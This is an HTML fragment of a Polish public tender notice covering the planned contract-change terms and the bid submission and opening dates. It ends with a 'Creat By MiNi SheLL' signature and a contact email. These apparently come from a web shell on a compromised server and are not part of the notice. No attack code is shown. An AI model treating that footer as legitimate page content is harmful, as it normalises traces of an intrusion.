class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane jedynie w formie pisemnej w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem nieważności.<br/>2.	Zamawiający przewiduje możliwości zmiany Umowy w przypadku zaistnienia następujących okoliczności:<br/>1)	Zmiany terminu realizacji zadania w przypadku:<br/>a) przypadki losowe (kataklizmy lub inne czynniki zewnętrzne, niemożliwe do przewidzenia wydarzenia, którym nie można zapobiec), które będą miały wpływ na treść zawartej Umowy i termin realizacji usługi,<br/>b) zmiana przepisów powodujących konieczność innych rozwiązań niż ustalono w opisie przedmiotu umowy.<br/>2)	Pozostałe zmiany: <br/>a) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np. powoduje skrócenie terminu realizacji Umowy, zmniejszenie wartości zamówienia),<br/>b) zmiana sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy (np. terminu płatności faktury, zmiana okresu rozliczeniowego, zmiana godzin wydawania posiłków, zmiana sposobu wydawania posiłków) -zgodnie z wzorem umowy Załącznik 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b9b4037d-b7dd-498e-bdfa-4db3f54c1d8a</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-26 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com